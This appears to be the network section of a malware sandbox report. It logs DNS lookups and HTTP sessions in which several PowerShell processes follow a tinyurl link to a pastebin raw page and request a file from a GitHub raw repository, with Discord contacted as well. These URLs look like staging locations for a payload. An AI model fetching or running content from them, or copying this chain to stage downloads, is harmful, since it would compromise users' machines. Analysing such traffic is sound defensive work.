                                                                Oct 15, 2024 16:00:50.074522972 CEST44352167185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:50.074567080 CEST44352167185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:50.074593067 CEST52167443192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:50.074668884 CEST44352167185.199.109.133192.168.2.7
Oct 15, 2024 16:00:50.074718952 CEST | 52167 | 443 | 192.168.2.7 | 185.199.109.133
Oct 15, 2024 16:00:50.096357107 CEST | 52167 | 443 | 192.168.2.7 | 185.199.109.133
Oct 15, 2024 16:00:56.073613882 CEST | 52203 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:00:56.073646069 CEST | 443 | 52203 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:00:56.073725939 CEST | 52203 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:00:56.074188948 CEST | 52203 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:00:56.074206114 CEST | 443 | 52203 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:00:56.714109898 CEST | 443 | 52203 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:00:56.714206934 CEST | 52203 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:00:56.716419935 CEST | 52203 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:00:56.716445923 CEST | 443 | 52203 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:00:56.716933966 CEST | 443 | 52203 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:00:56.718024969 CEST | 52203 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:00:56.763402939 CEST | 443 | 52203 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:00:56.763457060 CEST | 52203 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:00:56.763475895 CEST | 443 | 52203 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:00:56.974246025 CEST | 443 | 52203 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:00:56.974339008 CEST | 443 | 52203 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:00:56.974401951 CEST | 52203 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:00:56.991894960 CEST | 52203 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:01:02.637052059 CEST | 52206 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:01:02.637095928 CEST | 443 | 52206 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:01:02.637240887 CEST | 52206 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:01:02.637535095 CEST | 52206 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:01:02.637548923 CEST | 443 | 52206 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:01:02.666007996 CEST | 52112 | 80 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:01:03.255007982 CEST | 443 | 52206 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:01:03.255111933 CEST | 52206 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:01:03.256499052 CEST | 52206 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:01:03.256505966 CEST | 443 | 52206 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:01:03.256850958 CEST | 443 | 52206 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:01:03.257725954 CEST | 52206 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:01:03.303420067 CEST | 443 | 52206 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:01:03.303574085 CEST | 52206 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:01:03.303585052 CEST | 443 | 52206 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:01:03.495681047 CEST | 443 | 52206 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:01:03.495851994 CEST | 443 | 52206 | 162.159.128.233 | 192.168.2.7
Oct 15, 2024 16:01:03.495917082 CEST | 52206 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:01:03.497900963 CEST | 52206 | 443 | 192.168.2.7 | 162.159.128.233
Oct 15, 2024 16:01:08.526271105 CEST | 52153 | 80 | 192.168.2.7 | 104.20.3.235
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 16:00:00.424312115 CEST | 65354 | 53 | 192.168.2.7 | 1.1.1.1
Oct 15, 2024 16:00:01.957214117 CEST | 62304 | 53 | 192.168.2.7 | 1.1.1.1
Oct 15, 2024 16:00:10.416733027 CEST | 60519 | 53 | 192.168.2.7 | 1.1.1.1
Oct 15, 2024 16:00:10.424205065 CEST | 53 | 60519 | 1.1.1.1 | 192.168.2.7
Oct 15, 2024 16:00:11.112942934 CEST | 63701 | 53 | 192.168.2.7 | 1.1.1.1
Oct 15, 2024 16:00:11.119957924 CEST | 53 | 63701 | 1.1.1.1 | 192.168.2.7
Oct 15, 2024 16:00:12.232745886 CEST | 54281 | 53 | 192.168.2.7 | 1.1.1.1
Oct 15, 2024 16:00:12.239821911 CEST | 53 | 54281 | 1.1.1.1 | 192.168.2.7
Oct 15, 2024 16:00:25.339085102 CEST | 53 | 51572 | 1.1.1.1 | 192.168.2.7
Oct 15, 2024 16:00:27.865967989 CEST | 62676 | 53 | 192.168.2.7 | 1.1.1.1
Oct 15, 2024 16:00:27.873362064 CEST | 53 | 62676 | 1.1.1.1 | 192.168.2.7
Oct 15, 2024 16:00:39.578011990 CEST | 62055 | 53 | 192.168.2.7 | 1.1.1.1
Oct 15, 2024 16:00:39.585885048 CEST | 53 | 62055 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 16:00:00.424312115 CEST | 192.168.2.7 | 1.1.1.1 | 0x3338 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:01.957214117 CEST | 192.168.2.7 | 1.1.1.1 | 0x46fa | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:10.416733027 CEST | 192.168.2.7 | 1.1.1.1 | 0x2d74 | Standard query (0) | tinyurl.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:11.112942934 CEST | 192.168.2.7 | 1.1.1.1 | 0x3422 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:12.232745886 CEST | 192.168.2.7 | 1.1.1.1 | 0x2be1 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:27.865967989 CEST | 192.168.2.7 | 1.1.1.1 | 0xb30 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:39.578011990 CEST | 192.168.2.7 | 1.1.1.1 | 0xe5f3 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 16:00:00.432708025 CEST | 1.1.1.1 | 192.168.2.7 | 0x3338 | No error (0) | time.windows.com | twc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 15, 2024 16:00:01.258724928 CEST | 1.1.1.1 | 192.168.2.7 | 0x4530 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 15, 2024 16:00:01.258724928 CEST | 1.1.1.1 | 192.168.2.7 | 0x4530 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:02.200792074 CEST | 1.1.1.1 | 192.168.2.7 | 0x46fa | No error (0) | time.windows.com | twc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 15, 2024 16:00:10.424205065 CEST | 1.1.1.1 | 192.168.2.7 | 0x2d74 | No error (0) | tinyurl.com | - | 104.18.111.161 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:10.424205065 CEST | 1.1.1.1 | 192.168.2.7 | 0x2d74 | No error (0) | tinyurl.com | - | 104.17.112.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:11.119957924 CEST | 1.1.1.1 | 192.168.2.7 | 0x3422 | No error (0) | pastebin.com | - | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:11.119957924 CEST | 1.1.1.1 | 192.168.2.7 | 0x3422 | No error (0) | pastebin.com | - | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:11.119957924 CEST | 1.1.1.1 | 192.168.2.7 | 0x3422 | No error (0) | pastebin.com | - | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:12.239821911 CEST | 1.1.1.1 | 192.168.2.7 | 0x2be1 | No error (0) | raw.githubusercontent.com | - | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:12.239821911 CEST | 1.1.1.1 | 192.168.2.7 | 0x2be1 | No error (0) | raw.githubusercontent.com | - | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:12.239821911 CEST | 1.1.1.1 | 192.168.2.7 | 0x2be1 | No error (0) | raw.githubusercontent.com | - | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:12.239821911 CEST | 1.1.1.1 | 192.168.2.7 | 0x2be1 | No error (0) | raw.githubusercontent.com | - | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:27.873362064 CEST | 1.1.1.1 | 192.168.2.7 | 0xb30 | No error (0) | discord.com | - | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:27.873362064 CEST | 1.1.1.1 | 192.168.2.7 | 0xb30 | No error (0) | discord.com | - | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:27.873362064 CEST | 1.1.1.1 | 192.168.2.7 | 0xb30 | No error (0) | discord.com | - | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:27.873362064 CEST | 1.1.1.1 | 192.168.2.7 | 0xb30 | No error (0) | discord.com | - | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:27.873362064 CEST | 1.1.1.1 | 192.168.2.7 | 0xb30 | No error (0) | discord.com | - | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:39.585885048 CEST | 1.1.1.1 | 192.168.2.7 | 0xe5f3 | No error (0) | pastebin.com | - | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:39.585885048 CEST | 1.1.1.1 | 192.168.2.7 | 0xe5f3 | No error (0) | pastebin.com | - | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:39.585885048 CEST | 1.1.1.1 | 192.168.2.7 | 0xe5f3 | No error (0) | pastebin.com | - | 172.67.19.24 | A (IP address) | IN (0x0001) | false
• pastebin.com
• raw.githubusercontent.com
• discord.com
• tinyurl.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49744 | 104.18.111.161 | 80 | 6448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:10.479126930 CEST | 164 | OUT | GET /yeykydun HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tinyurl.com
Connection: Keep-Alive
Oct 15, 2024 16:00:11.103497982 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 14:00:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://pastebin.com/raw/sA04Mwk2
Referrer-Policy: unsafe-url
X-Robots-Tag: noindex
X-TinyURL-Redirect-Type: redirect
Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
CF-Cache-Status: HIT
Age: 406
Set-Cookie: __cf_bm=7hoX_E8_iPnMl1MRR4c5e1JNiP7qXA3CNP6ag8nUpUE-1729000811-1.0.1.1-hSng.tpzjiNYJy8Vcd79KXhFBTyhxddTFNiQTAgKXf4c7Mnwpfq9c.XZrw6T9ybkjFR7z2mw4Up1r6.jGNXxYQ; path=/; expires=Tue, 15-Oct-24 14:30:11 GMT; domain=.tinyurl.com; HttpOnly
Server: cloudflare
CF-RAY: 8d30557cee886b17-DFW
alt-svc: h3=":443"; ma=86400
Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
Oct 15, 2024 16:00:11.103718042 CEST | 256 | IN | Data Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49743 | 104.18.111.161 | 80 | 7352 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:10.481404066 CEST | 164 | OUT | GET /yeykydun HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tinyurl.com
Connection: Keep-Alive
Oct 15, 2024 16:00:11.113112926 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 14:00:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://pastebin.com/raw/sA04Mwk2
Referrer-Policy: unsafe-url
X-Robots-Tag: noindex
X-TinyURL-Redirect-Type: redirect
Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
CF-Cache-Status: HIT
Age: 406
Set-Cookie: __cf_bm=fWzWzmRoLK_XuppO0Ee3iOrkgJ6su945hqM2_hqHGck-1729000811-1.0.1.1-6IZmwajNURh5mByFdnBHAfqeqL409ZmMXBgB1NwVtBW9dGzjDNowrG_AQQePhxOTGD9Jr8Yn97YV8WoiIgRCnQ; path=/; expires=Tue, 15-Oct-24 14:30:11 GMT; domain=.tinyurl.com; HttpOnly
Server: cloudflare
CF-RAY: 8d30557cda4a6b49-DFW
alt-svc: h3=":443"; ma=86400
Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
Oct 15, 2024 16:00:11.113164902 CEST | 251 | IN | Data Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><
Oct 15, 2024 16:00:11.113174915 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49745 | 104.18.111.161 | 80 | 7180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:10.496746063 CEST | 164 | OUT | GET /yeykydun HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tinyurl.com
Connection: Keep-Alive
Oct 15, 2024 16:00:11.132302999 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 14:00:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://pastebin.com/raw/sA04Mwk2
Referrer-Policy: unsafe-url
X-Robots-Tag: noindex
X-TinyURL-Redirect-Type: redirect
Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
CF-Cache-Status: HIT
Age: 406
Set-Cookie: __cf_bm=hL_BO4LGQrW63kHAwiCUlH4rsb_idB48vduEtXFPH5U-1729000811-1.0.1.1-OShRh3kekPzLOkTIQX4s5NsIJia9jDfMJt0FfFcadyPr0PSH_YYVd3kH5TgVdbv.d0_oorcwp2hOwhRQBxTG6A; path=/; expires=Tue, 15-Oct-24 14:30:11 GMT; domain=.tinyurl.com; HttpOnly
Server: cloudflare
CF-RAY: 8d30557d0d83e5b9-DFW
alt-svc: h3=":443"; ma=86400
Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
Oct 15, 2024 16:00:11.132322073 CEST | 256 | IN | Data Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49746 | 104.18.111.161 | 80 | 7172 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:10.515091896 CEST | 164 | OUT | GET /yeykydun HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tinyurl.com
Connection: Keep-Alive
Oct 15, 2024 16:00:11.166562080 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 14:00:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://pastebin.com/raw/sA04Mwk2
Referrer-Policy: unsafe-url
X-Robots-Tag: noindex
X-TinyURL-Redirect-Type: redirect
Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
CF-Cache-Status: HIT
Age: 406
Set-Cookie: __cf_bm=JsRRUJZw7yCehNAtLMXnpzlJCTpaH1HIlM3VjobB1Rc-1729000811-1.0.1.1-lv6ebRYZN3H4MT_C3yOcQyoigjHEDTjuWDjcl0VeiaaPgNUQoj2TyTe9U7cfYqQaKjMxV0dz8uTSGMyWrgGIiw; path=/; expires=Tue, 15-Oct-24 14:30:11 GMT; domain=.tinyurl.com; HttpOnly
Server: cloudflare
CF-RAY: 8d30557d3eba46cb-DFW
alt-svc: h3=":443"; ma=86400
Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
Oct 15, 2024 16:00:11.166600943 CEST | 251 | IN | Data Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><
Oct 15, 2024 16:00:11.166610956 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49760 | 185.199.109.133 | 80 | 7180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:12.245913982 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 16:00:12.865664005 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 14:00:12 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120139-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000813.798404,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 14:05:12 GMT
Vary: Authorization,Accept-Encoding


Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49759 | Destination IP: 185.199.109.133 | Destination Port: 80 | PID: 7172 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:12.246109962 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 16:00:12.871643066 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 14:00:12 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210176-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000813.807264,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 14:05:12 GMT
Vary: Authorization,Accept-Encoding


Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49761 | Destination IP: 185.199.109.133 | Destination Port: 80 | PID: 6448 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:12.246268034 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 16:00:12.871684074 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 14:00:12 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120134-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000813.807537,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
